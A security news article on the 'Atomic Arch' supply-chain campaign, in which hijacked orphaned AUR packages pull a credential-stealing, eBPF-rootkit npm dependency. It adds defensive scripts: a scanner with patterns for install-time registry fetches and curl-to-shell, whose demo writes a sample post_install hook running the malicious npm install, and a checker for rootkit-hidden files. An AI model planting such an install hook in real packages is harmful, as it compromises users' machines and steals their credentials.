Sonatype, a software supply chain security firm, has identified a malicious campaign targeting Linux systems through a novel delivery method. The attackers abuse the ownership-transfer process for abandoned open-source packages, rather than any flaw in the software itself, to deploy malware discreetly.
This operation, known as “Atomic Arch,” targets the Arch User Repository (AUR), a community repository where users publish the build scripts (PKGBUILDs) for software that is not in the official Arch Linux repositories. When a maintainer disowns a package or stops maintaining it, it becomes an orphaned package, and any registered AUR user can adopt it and take over its updates.
The danger lies in the apparent legitimacy of these packages. Because an adopted package keeps its original name and trusted history, users who already have it installed pull the attacker's update through their AUR helper, believing it to be a routine release.
Researchers report that more than 20 AUR packages have already been compromised in this campaign. Sonatype has published its findings, including technical details of this ongoing software supply chain attack.
Inside the Attack Chain
Eyad Hasan, a Sonatype engineer, first brought the issue to light. The ensuing investigation found that the attackers do not modify the upstream source code of the affected applications; instead, they alter the build instructions in the package's PKGBUILD file.
On installation or update, a rogue post-install script runs the command npm install atomic-lockfile minimist chalk, which pulls the malicious dependency atomic-lockfile from the public npm registry (minimist and chalk are two widely used legitimate packages that make the command look routine). Because the AUR package's own sources are untouched, the hijacked package looks benign, and signature-based security tools have nothing to match against. Sonatype Research Labs has flagged the atomic-lockfile dependency and assigned it a high-severity CVSS score of 8.7.
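The practical check this technique calls for is to read the build files of an AUR package before installing or updating it, looking for commands that fetch and run code from a registry or the web at build or install time, which is exactly what the PKGBUILD's source array and checksums do not cover. The script below is an added example, not Sonatype's or the AUR's code: it scans a package directory's PKGBUILD and .install hooks for such commands, treats hits in an .install hook as high severity because post_install runs as root on every machine that installs the package, and demonstrates itself on a constructed package modelled on the campaign. The pattern list, the severity mapping, the sample files and the AUR-helper cache paths are assumptions to adjust for your own environment.

```shell
#!/usr/bin/env bash
# Audit an AUR package's build files for commands that fetch and run code from a
# registry or the web at build or install time. Added example; not Sonatype's or
# the AUR's code. The pattern list, severity mapping and the sample package built
# by make_sample_dir are constructed for illustration.
set -u

# Word-boundary helpers in portable ERE (avoids the GNU-only \b).
B='(^|[^[:alnum:]_-])'
E='([[:space:]]|$)'

# Registry installers invoked with an install/add/get verb, or a download piped
# into a shell. Assumption: this is a starting list, extend it for your needs.
FETCH_RE="${B}(npm|pnpm|yarn|pip[0-9]?|pipx|cargo|gem|go)[[:space:]]+(install|add|get)${E}|${B}(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh${E}"

# scan_file FILE LEVEL: print "LEVEL FILE:LINE: text" for each hit, skipping
# blank and comment-only lines so a commented-out command is not a finding.
scan_file() {
    local file=$1 level=$2 lineno=0 line stripped
    while IFS= read -r line || [ -n "$line" ]; do
        lineno=$((lineno + 1))
        stripped=${line#"${line%%[![:space:]]*}"}   # drop leading whitespace
        case $stripped in '#'*|'') continue ;; esac
        if printf '%s\n' "$line" | grep -Eq "$FETCH_RE"; then
            printf '%s %s:%d: %s\n' "$level" "$file" "$lineno" "$stripped"
        fi
    done < "$file"
}

# audit_dir DIR: fetches inside the PKGBUILD are REVIEW (build-time installs
# are common for Node, Rust and Go packages, but still read the diff); fetches
# inside an .install hook are HIGH, since post_install runs as root on every
# machine that installs or updates the package.
audit_dir() {
    local dir=$1 f
    for f in "$dir"/PKGBUILD "$dir"/*.install; do
        [ -f "$f" ] || continue
        case $f in
            *.install) scan_file "$f" HIGH ;;
            *)         scan_file "$f" REVIEW ;;
        esac
    done
}

# count_findings DIR LEVEL: number of findings at the given severity level.
count_findings() {
    audit_dir "$1" | grep -c "^$2 " || true
}

# audit_helper_cache: audit the clones your AUR helper keeps locally.
# Assumption: yay stores them under ~/.cache/yay and paru under
# ~/.cache/paru/clone; adjust for other helpers.
audit_helper_cache() {
    local d
    for d in "$HOME"/.cache/yay/*/ "$HOME"/.cache/paru/clone/*/; do
        [ -f "$d/PKGBUILD" ] && audit_dir "${d%/}"
    done
}

# make_sample_dir: a constructed package directory modelled on the Atomic Arch
# technique. The PKGBUILD stays clean; the .install hook pulls a dependency from
# npm at install time. Prints the directory path.
make_sample_dir() {
    local d
    d=$(mktemp -d)
    cat > "$d/PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=2
install=example-tool.install
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
package() {
    install -Dm755 "$srcdir/example-tool" "$pkgdir/usr/bin/example-tool"
}
EOF
    cat > "$d/example-tool.install" <<'EOF'
post_install() {
    # npm install used to live here for the dev build
    npm install atomic-lockfile minimist chalk
}
post_upgrade() { post_install; }
EOF
    printf '%s\n' "$d"
}

if [ $# -gt 0 ]; then
    audit_dir "$1"            # audit a real package directory
else
    sample=$(make_sample_dir) # demo on the constructed package
    audit_dir "$sample"
    rm -rf "$sample"
fi
```

Run it with a package directory as the argument, or with none to see the demo, which reports the single HIGH finding on line 3 of the .install hook and nothing for the clean PKGBUILD. Note that the native binary in atomic-lockfile runs from an npm pre-install hook, so a finding like this one means the fetch executed code at install time, not merely downloaded it; npm's --ignore-scripts option prevents lifecycle scripts from running during an install, which is worth setting globally on build machines.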
Advanced Stealth Techniques
Further analysis by Sonatype researcher Adam Reynolds found that the atomic-lockfile package bundles a native Linux binary that runs from the package's pre-install hook. The binary uses eBPF, the Linux kernel facility for running sandboxed programs inside the kernel, to deploy additional malicious payloads.
The investigation found that the malware loads an eBPF program, scales.bpf.c, that gives it rootkit-like capabilities. By tampering with the system calls that return directory listings, it hides its files and processes from anything that enumerates a directory. It also watches the host for debugging tools, to hinder analysis by security software and researchers.
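A rootkit that filters directory-listing system calls only affects code that enumerates entries; a direct path lookup via stat() still succeeds, and on conventional Linux filesystems a directory's link count still reflects every subdirectory whether or not it is listed. The script below is an added example, not Sonatype's code, that turns both observations into checks: it compares what a listing returns against direct probes of candidate names (for /proc, every PID up to pid_max), and compares a directory's link count against the subdirectories a listing shows. The demo directory it builds and the candidate name lists are constructed for illustration; loaded_bpf_programs is an optional root-only step that uses the real bpftool commands.

```shell
#!/usr/bin/env bash
# Cross-check directory listings (which the kernel serves through the getdents
# family of syscalls) against direct stat() probes and link counts to spot
# entries a listing-filtering rootkit hides. Added example, not Sonatype's code;
# the demo directory and candidate name lists are constructed assumptions.
set -u

# find_hidden DIR: reads candidate names from stdin and prints every name that
# exists under DIR according to stat() (the [ -e ] / [ -L ] tests) but is
# missing from the listing. Names containing newlines are not supported.
find_hidden() {
    local dir=$1 name listed present
    listed=$(mktemp); present=$(mktemp)
    ls -A1 "$dir" 2>/dev/null | LC_ALL=C sort -u > "$listed"
    while IFS= read -r name; do
        [ -n "$name" ] || continue
        if [ -e "$dir/$name" ] || [ -L "$dir/$name" ]; then printf '%s\n' "$name"; fi
    done | LC_ALL=C sort -u > "$present"
    LC_ALL=C comm -13 "$listed" "$present"   # present on disk, absent from listing
    rm -f "$listed" "$present"
}

# find_hidden_pids: probe /proc/<pid> for every PID up to pid_max. Processes
# that start or exit between the listing and the probe appear as noise, so run
# it twice and keep only PIDs reported both times. Probing all of pid_max
# (commonly 4194304) takes a while.
find_hidden_pids() {
    local max
    max=$(cat /proc/sys/kernel/pid_max 2>/dev/null || echo 32768)
    seq 1 "$max" | find_hidden /proc
}

# check_subdir_count DIR: on filesystems that keep the classic Unix convention
# a directory's link count is 2 + its number of subdirectories, so a subdirectory
# hidden from the listing shows up as a mismatch. Prints OK, MISMATCH or SKIP
# (btrfs and overlayfs report a link count of 1 for directories, so the check
# does not apply there).
check_subdir_count() {
    local dir=$1 nlink listed=0 entry
    nlink=$(stat -c %h "$dir" 2>/dev/null || stat -f %l "$dir")
    [ "$nlink" -ge 2 ] || { echo SKIP; return 0; }
    for entry in "$dir"/.[!.]* "$dir"/..?* "$dir"/*; do   # globs use the listing
        if [ -d "$entry" ] && [ ! -L "$entry" ]; then listed=$((listed + 1)); fi
    done
    if [ $((nlink - 2)) -eq "$listed" ]; then echo OK; else echo MISMATCH; fi
}

# loaded_bpf_programs: list loaded eBPF programs and their attachments with
# bpftool (needs root; not run by the demo). A tracepoint or kprobe program
# attached around the directory-listing syscalls that no tool you know of
# loaded deserves a closer look.
loaded_bpf_programs() {
    command -v bpftool >/dev/null || { echo "bpftool not installed" >&2; return 1; }
    bpftool prog show
    bpftool link show
}

# make_demo_dir: constructed directory with three subdirectories and two files.
make_demo_dir() {
    local d
    d=$(mktemp -d)
    mkdir "$d/sub1" "$d/sub2" "$d/sub3"
    : > "$d/file1"; : > "$d/file2"
    printf '%s\n' "$d"
}

demo=$(make_demo_dir)
printf 'hidden in demo dir: [%s]\n' "$(printf 'sub1\nfile1\nghost\n' | find_hidden "$demo")"
printf 'subdirectory count check: %s\n' "$(check_subdir_count "$demo")"
rm -rf "$demo"
```

On an uncompromised system both checks come back clean (no hidden names, OK or SKIP), which is the baseline to record before an incident. Because these probes run in user space, an eBPF component that also hooks stat or the link-count path could defeat them; that is why pairing them with an inventory of loaded BPF programs, and with offline examination of the disk from a boot medium, is the more reliable approach when compromise is suspected.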
The malware's primary objective appears to be credential theft: it targets GitHub keys, SSH credentials, HashiCorp Vault tokens, browser cookies, and saved data from popular communication platforms, including Slack, Discord, Microsoft Teams, and Telegram. Stolen data is exfiltrated directly to the attackers through built-in web upload functionality.
While some characteristics of this campaign resemble an earlier incident dubbed IronWorm, Sonatype has not attributed it to a specific threat actor. Security practitioners caution that simply uninstalling the AUR package will not remove the threat once the deeper system payload has run: the files that npm fetched at install time are not tracked by pacman and are not removed when the package is, so a host where the hook executed should be treated as compromised.